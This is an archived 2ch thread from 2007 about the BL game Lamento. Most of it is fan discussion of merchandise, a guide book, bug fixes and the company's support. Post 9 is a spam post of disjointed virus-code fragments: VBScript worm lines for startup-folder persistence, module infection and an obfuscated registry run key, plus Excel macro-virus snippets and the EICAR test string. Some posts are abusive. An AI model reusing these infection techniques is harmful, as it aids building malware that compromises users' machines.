5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

BL@Lamento 41【Nitro+CHiRAL】

1 :1/4:2007/10/05(金) 19:37:16 ID:???
キラルの新作、Lamento -BEYOND THE VOID-について語りましょう
レスする前に>>1-4をよく読むこと

公式サイト
http://www.nitrochiral.com/pc/

関連スレ
BL@Nitro+CHiRAL総合 76
http://game12.2ch.net/test/read.cgi/gboy/1191420414/

BL@咎狗の血 33【Nitro+CHiRAL】
http://game12.2ch.net/test/read.cgi/gboy/1191421799/

前スレ
BL@Lamento 40【Nitro+CHiRAL】
http://game12.2ch.net/test/read.cgi/gboy/1190294324/

■荒らし行為や嫌なカプ話はスルー。被害妄想に陥らない。別の話題を振りましょう。
■ここはマンセースレではありません。萌えも萎えも賞賛も不満もありです。
■ボブゲ自体を卑下したり、今までのメーカーを貶めるような発言はしない。
■良くも悪くも、前作をひきあいに出して話さない。無意味に荒れる原因になります。
■意味もないキャラ萌え禁止。
■ローカルルールは守る。
  オフィシャルのものを無断でうp、といった非常識な行動はとらない。
■You Tube、ニコニコ動画、Winny等、動画共有に関する話題は禁止。
■ゲームを離れた二次創作、二次妄想は同人コミケ板or避難所の該当スレへ。
■雑誌バレは発売三日後、本編バレは発売一週間後に解禁。それまでは避難所かメール欄で。
■sage進行推奨
■次スレは>>970がよろしく

じっくりとキャラ萌えを叫びたい人はここでどうぞ
ニトロキラル避難所
ttp://jbbs.livedoor.jp/game/18187/

2 :2/4:2007/10/05(金) 19:38:13 ID:???
スレのレス速度問題についてQ&A
・鯖負担だ
http://sv2ch.baila6.jp/sv2ch01.html
で負荷を確認してから書きましょう
・チャットやめろ。ローカルルールで禁止されてる
→運営側による実況/チャットについての概要
http://qb3.2ch.net/test/read.cgi/operate/1067731439/3
Q.雑談やチャット状態(短期間でたくさんの短いレスがつく)は禁止なの?
A.掲示板の話題と無関係な馴れ合いや挨拶は推奨されない。
 ある程度ならともかく、スレの大半がそうなると削除される可能性有り。
 試合の実況は厳禁行為。
 掲示板の話題で実況でないのなら、チャット状態で盛り上がってもある程度は問題なし。
・このスレいらないじゃん、避難所行こう
→各々で使いたい方を選びましょう

3 :3/4:2007/10/05(金) 19:39:13 ID:???
■Lamento -BEYOND THE VOID-
DVD-ROM版 10月27日発売/CD-ROM版 11月10日発売
CD-ROMは06.12.08 ロットアップ 店頭及び通販在庫分のみで販売終了
DVD-ROMは07.03.12 ロットアップ 店頭及び通販在庫分のみで販売終了
DVD-ROM通常版は4月27日発売

\ うるさい、それ以上聞くな。早く調べろ、お前 /
   ̄V ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
             _____
  ∧_,,∧≡つ  | | \    \
 (`・ω・)≡つ. || |     |
┌(`≡つつつつ| |/ ̄ ̄ ̄/
| ヽ≡つ二二二」二二二二二

●質問する前に一度は自分で調べること
┣Google ttp://www.google.co.jp/
┣女向ゲー大人過去ログ墓場 ttp://makimo.to/2ch/game9_gboy/index.html
┗キーワード検索 (キーボードの「Ctrl+F」)

●DVD-ROM版とCD-ROM版の違いは?
 画質・内容・特典など、メディア以外はまったく同じです。
 自分のパソコンはDVDに対応してますか?
 してる人はDVD版を買い、してない人はCD版を買いましょう。
 スペックに関しては公式FAQページを参考に
 ttp://www.nitrochiral.com/pc/support/faq_0201_lamento.html

●CLUBHOBi特設ページ(特典イラストのまとめあり)
 ttp://www.clubhobi.net/image/expage/lamento_ex

4 :4/4:2007/10/05(金) 19:40:15 ID:???
<不具合対策>
・ライブラリーでCG閲覧しようと思うと一瞬で消える
自動メッセージ送りを解除するか最新パッチをあてる

・強制終了
パッチをあてる
※注意:正常に動いてる場合はパッチを入れない方が良いかもしれません
↓(だめなら)
落ちるシーンの直前でスキップ
↓(だめなら)
プレイモードを低スペック用に切り替える
↓(だめなら)
常駐ソフトを切ってみる(避難所スレ参照)
↓(だめなら)
バックアップとってセーブデータフォルダ内の直前データを消す
↓(だめなら)
バックアップとってセーブデータフォルダ内の他の無駄データ(数字のセーブファイル等)も消す
npsm.sav、npsg.savは消さない事
↓(だめなら)
セーブデータのバックアップをとって再インストールする
↓(だめなら)
キラルサポートに詳細を書いて連絡

つ【メモリ積める奴は積め】
つ【スペック未満・自作機の奴は自己責任】

5 :いけない名無しさん:2007/10/05(金) 19:43:23 ID:???
>>1
乙!

6 :いけない名無しさん:2007/10/05(金) 20:08:55 ID:???
      *-+。・+。-*。+。*
       \      。*゚
        ∩    *    >>1乙にな〜る☆
        (´・ω・`)
        。ヽ、  つ
       *゚  ヽ、 ⊃
       +゚    ∪~   ☆
       ゚+。*。・+。-*。+。*゚

7 :いけない名無しさん:2007/10/05(金) 20:14:05 ID:???
糞ゲ以下乙

8 :いけない名無しさん:2007/10/05(金) 20:28:44 ID:???
      *-+。・+。-*。+。*
       \      。*゚
        ∩∧ ∧ *    >>1乙! みんな上品にな〜れ☆
        (´・ω・`)
        。ヽ、  つ
       *゚  ヽ、 ⊃
       +゚    ∪~   ☆
       ゚+。*。・+。-*。+。*゚

9 :いけない名無しさん:2007/10/05(金) 21:25:53 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


10 :いけない名無しさん:2007/10/06(土) 00:14:09 ID:???
前スレ1000
気になるわ
ソースは?

11 :いけない名無しさん:2007/10/06(土) 00:22:56 ID:???
前スレ>>1000
フレンドリーの結果がボリしっぽかよナメてんじゃねーよ
狗CSの取り扱い未定とかバカか貴様ら
他社のブツでも扱ってるくせに氏ねいてめーら

12 :いけない名無しさん:2007/10/06(土) 00:25:16 ID:???
はいはいエスパーエスパー

13 :いけない名無しさん:2007/10/06(土) 00:25:55 ID:???
フレンドリーは文面についてだよ
商品の話まで知るかw
言いたいことあるならこんなとこで管巻いてないで自分で訴えれ

14 :いけない名無しさん:2007/10/06(土) 00:26:23 ID:???
○問い合わせの多い「しっぽストラップ」ですが、再生産検討中です。

これはギャグなの?
あの値段で買うとか正気?

15 :いけない名無しさん:2007/10/06(土) 00:29:06 ID:???
ttps://www.clubhobi.net/user/itemView.php?mode=1&oktoenter=1&pg=0

バルドpg……あれ?

16 :いけない名無しさん:2007/10/06(土) 00:32:44 ID:???
何があれ?なんだ

17 :いけない名無しさん:2007/10/06(土) 00:37:52 ID:???
バルドのテレカ付き本体が数量限定通販だそうな
ttp://www.clubhobi.net/user/itemView.php?shopCode=0001&shohinNo=00017437&mode=1

プルダウンメニューの「特典は必要ない」が
バルドとは関係ないと分かっていても泣ける

18 :いけない名無しさん:2007/10/06(土) 00:39:10 ID:???
前スレ1000の脳内スタッフの言葉かよ
フレンドリーっていうのは、ファンにくだけた言葉で適当なことをいうことなのか?

大半のユーザーが求めているのは
ニトロ+キラルの製品(not他社ゲー)を迅速に販売してくれることでしょ
間違っても今の、自社ブランドの商品を特典もなく
予約も取らずに気が向いたときに販売開始している状況ではないな


19 :いけない名無しさん:2007/10/06(土) 00:42:07 ID:???
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \ /  \

直接ニトロにメールしろやクズw

20 :いけない名無しさん:2007/10/06(土) 00:43:29 ID:???
社員乙

21 :いけない名無しさん:2007/10/06(土) 00:44:58 ID:???
>>18
脳内だと思うならニトダイに聞いてみ
ただしあくまで文面がおかしいって指摘してもらえた返答だから
そこら辺は思い違いしないでね

商品について物申したいなら自分で問い合わせれ

22 :いけない名無しさん:2007/10/06(土) 00:48:32 ID:???
これは…
本格的にプリンスオブ斜め上と呼ぶことを検討した方がいいかもしれん

というかいい年したエロゲボブゲやるような野郎やら腐女子が
フレンドリーにして欲しいなんて要望出してることにびっくりだよ

23 :いけない名無しさん:2007/10/06(土) 00:51:26 ID:???
>>21


ニトダイってなんだ、学生バイトの集団っつかサークルなのか?

24 :いけない名無しさん:2007/10/06(土) 00:51:36 ID:???
ノートパソコン新調しようとして
兄グッズの猫PCクッションインナーケースのサイズ見てみたがちっさー
15.4インチどころか14.1でも入らないサイズ
キラルセレブ御用達のキラルノートももちろん無理
このケース本当にモバイルサイズのパソコンにしか使えないのな

25 :いけない名無しさん:2007/10/06(土) 00:54:27 ID:???
キラルで実用性のあるグッズなんて皆無
せいぜいコンパクトミラー(物の割には馬鹿高)ぐらいですから

26 :いけない名無しさん:2007/10/06(土) 00:55:56 ID:???
メールブロックは悪くなかったよ
外ではほぼ全反射で画面見えないけど

27 :いけない名無しさん:2007/10/06(土) 00:57:32 ID:???
>>26
ブロックしすぎです><

28 :いけない名無しさん:2007/10/06(土) 00:59:25 ID:???
>>22-23
噛み砕くとフレンドリーになるだけで
もっとまともな表現だったから誤解しないでね
中の人の対応は至極まともだった

ネイルケアセットは使いやすければ買いたいな
持ってる人レポ希望

29 :いけない名無しさん:2007/10/06(土) 01:04:21 ID:???
メール返した中の人の対応がまともでも
ニトダイの文章がプチ失礼じゃ全然意味ないやん

30 :いけない名無しさん:2007/10/06(土) 01:08:21 ID:???
>>28
グッズ紹介写真だとネイルケアセットの模様はエッチングだけど
実際は黒色のプリント。
銀地に黒なので模様が目立ち18歳以上が持ち歩くには微妙な感じ?
黒のところは部屋だけで使っていてもすぐ剥げてきます。
中身は100均アイテムよりも使いにくいが使えないことは無い。
持ってないが、コンパクトミラーも黒のプリントなのでたぶん剥げる。

31 :いけない名無しさん:2007/10/06(土) 01:10:56 ID:???
>>28
あれ何かの景品で全く同じようなのを貰ったことある。
ネイルケアに気を使う人なら多少は使いであるのかも。
同じのを貰ってほとんど使わなかったから自分はラメのも買ってない。
とりあえずロゴ入り?の物が手元に欲しいなら買ってもいいんじゃないかな。

32 :31:2007/10/06(土) 01:13:10 ID:???
ごめんちんたら書いてたら被った

>>実際は黒色のプリント。
それでか・・ミラーも写真だとグレーっぽい、いい色合いなのに
なんで黒?とか思ったんだよ・・・やっぱり嘘だよなあ・・・

33 :いけない名無しさん:2007/10/06(土) 01:16:21 ID:???
アロマキャンドルも割と良い
ttp://www.imgup.org/iup478216.jpg.html

34 :いけない名無しさん:2007/10/06(土) 01:17:54 ID:???
完璧なコレクションアイテムだね
家でこっそり使えるものだし買ってみるよ
d

35 :いけない名無しさん:2007/10/06(土) 02:01:49 ID:???
そもそもニトロ自体が学生バイトの寄せ集めみたいな
会社だものな

36 :いけない名無しさん:2007/10/06(土) 02:04:24 ID:???
ああいう会社って50過ぎとかになったらどうやって生きてくの?

37 :いけない名無しさん:2007/10/06(土) 02:46:07 ID:???
ダンボール生活

38 :いけない名無しさん:2007/10/06(土) 12:53:20 ID:???
企業サイトでフレンドリーだとなんか胡散臭くなるよな
新商品よりポイント交換商品復活マダチン

39 :いけない名無しさん:2007/10/06(土) 15:20:54 ID:???
そのくせスゲー他力な会社なんだよねニトロって…
そんなのお前んとこの仕事だろみたいなのを平気で他所に
振ってきて、見てて恥ずかしい。特に広報が最悪だわ

40 :いけない名無しさん:2007/10/06(土) 15:23:36 ID:???
いい加減キラルスレでやらない?

41 :いけない名無しさん:2007/10/06(土) 15:30:43 ID:???
猫がキラルをズタズタにした件について

42 :いけない名無しさん:2007/10/06(土) 15:36:58 ID:???
つか誰だよこのゲーム面白いとか言える輩はよ…
氏ねよ
ゴミなんだよさっさと氏ね

43 :いけない名無しさん:2007/10/06(土) 15:52:56 ID:???
>>33
アロマキャンドル思っていたより全然雰囲気あるね!
ポチってくる

44 :いけない名無しさん:2007/10/06(土) 16:54:01 ID:???
本当だアロマキャンドル中々良いな
今度兄行ったら買ってみよう

45 :いけない名無しさん:2007/10/06(土) 16:56:17 ID:???
バカばっか

46 :いけない名無しさん:2007/10/06(土) 17:56:49 ID:???
タイピングソフトが欲しいな
ラスボスはじゅじゅちゅしでw

47 :いけない名無しさん:2007/10/06(土) 20:01:33 ID:???
追従

48 :いけない名無しさん:2007/10/07(日) 21:00:08 ID:???
激萌えガイド買った方いらっしゃいませんかー
キャラに10の質問!とか地味に萌えた

49 :いけない名無しさん:2007/10/07(日) 21:24:27 ID:???
自分も激萌えガイド買った人の感想訊きたかった
猫的に買ってもよさげな内容?
 
立ち読みしようにも恥ずかしくて…

50 :いけない名無しさん:2007/10/07(日) 21:42:44 ID:???
>>49
淵井たんのインタビューも載ってるし10の質問も可愛かった
自分は満足してるよ

51 :いけない名無しさん:2007/10/07(日) 23:09:56 ID:???
コノエとアサとの夢が可愛くてツボった
立ち読みだけでも、見てみるといいかも


52 :いけない名無しさん:2007/10/08(月) 00:46:38 ID:???
10の質問
アサト・コノエは普通に和んだし
バルドがちゃんとオヤジしててよかった

53 :いけない名無しさん:2007/10/08(月) 09:34:50 ID:???
10質猫もあるのか!
ライの答えはだいたい予想つくw

54 :いけない名無しさん:2007/10/08(月) 10:06:17 ID:???
ライねぇ・・・・答える気ないんだろうとは思ったんだけどね・・・

55 :いけない名無しさん:2007/10/08(月) 12:31:10 ID:???
キャラだといえばそれまでだけど手抜きっぽいよな

56 :いけない名無しさん:2007/10/08(月) 18:32:16 ID:???
手抜き感は否めないが
ライの10番目の答えには不覚にも萌えた…

57 :いけない名無しさん:2007/10/09(火) 00:03:45 ID:???
リーダーズまだ買える所ある?

58 :いけない名無しさん:2007/10/09(火) 00:06:09 ID:???
兄友とか連休前は余りまくってた
今は知らないけど

59 :いけない名無しさん:2007/10/09(火) 00:09:43 ID:???
密林にあるよ

60 :いけない名無しさん:2007/10/09(火) 00:56:22 ID:???
虎店頭にもいっぱいあったよ

61 :いけない名無しさん:2007/10/09(火) 04:14:41 ID:???
あーっ!くそ!!!!!
ちみカワイ過ぎ!!

62 :いけない名無しさん:2007/10/09(火) 11:20:04 ID:???
朝4時に叫んでる61にワロタw
ちみのお腹辺り見てると和んでぼーとしてしまうw

63 :いけない名無しさん:2007/10/09(火) 14:16:43 ID:???
ちみいくつか買ってみたら欲しかったのが当たった
とりあえず開けて棚に一列に並べてみた
なんだろうこのほわほわした気持ち

64 :いけない名無しさん:2007/10/09(火) 15:26:27 ID:???
おめでとう

65 :いけない名無しさん:2007/10/09(火) 15:53:15 ID:???
3個バラで買って、フラウドが2個もきた私は負け組w

66 :いけない名無しさん:2007/10/09(火) 16:08:08 ID:???
むしろ羨ましい。それで白猫挟みたいw
箱買いしたけど勿体なくて飾れない…


67 :いけない名無しさん:2007/10/09(火) 17:55:01 ID:???
ちみは髪の質感の違いが面白い
ライのシアーパール、ラゼルのパールグラデ
カルツのグロス、ヴェルグリークスのマットグラデなどいい感じだ

68 :いけない名無しさん:2007/10/10(水) 00:08:29 ID:???
猫は装飾細かいのに塗りが雑じゃなくて良いね。眺めながら彩色大変だっただろうなと思う
ラゼルの髪が長いのにときめいたw

69 :いけない名無しさん:2007/10/10(水) 01:03:09 ID:???
<ちらし>
フラウドの中の人がバイク乗りに出るとここで聞き、見てみたが
バイク乗りでの笹沼の外の人達のしゃべりは
「〜しちゃおうか。」「しちゃおうよ。」って感じで、キルウルにしか見えなかった。
</ちらし>
キルウルかわいいよキルウル。

>>65
自分にくれ。

70 :いけない名無しさん:2007/10/10(水) 01:09:27 ID:???
>>69
チラシに書けや雑魚

71 :いけない名無しさん:2007/10/10(水) 03:17:03 ID:???
激萌えガイド、猫だけのために2100円出す価値あるのかどうか悩む
見て確かめようにも、近場の大きい本屋にも置いてないんだよね…
いろんなブログとか見ると概ね好評みたいだけど
リーダーズの直後なんでよく見えるのかなとか思ったりもする。
リーダーズは置いてあったけど緊縛されてて中身見れなかったなあ

72 :いけない名無しさん:2007/10/10(水) 07:37:21 ID:???
猫だけなら2100円の価値は無いような…
10の質問以外はガイシュツネタばっかりだしな

自分は狗猫淵井インタビュに興味あり+
他にも好きなボブゲやら作家・声優のインタビュありだったから満足だったけど

73 :いけない名無しさん:2007/10/10(水) 14:19:13 ID:???
>>71
>>72も書いてるけどボブゲは猫にしか興味がないとか、淵井たんに興味がないなら
買わなくても言いと思う
でも、少しでもライターや他のボブゲに興味があるなら買って損無しの一冊だとオモ

自分にはいろんな意味で萌え満載の一冊ですた

74 :いけない名無しさん:2007/10/10(水) 20:47:20 ID:???
あの値段考えると立ち読みで十分だった
猫は6pぐらいだし

75 :71:2007/10/11(木) 00:18:29 ID:???
>72-74
実は猫以外のボブゲやったことないんだ…狗は買う予定だけど
淵井たんのインタビューは興味あるなあ

実物確かめられるところがないか梯子しつつもう少し迷ってみるよ
でもレス見てたら買う方にぐらついてきたw読み応えありそうだね
ありがとー

19 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)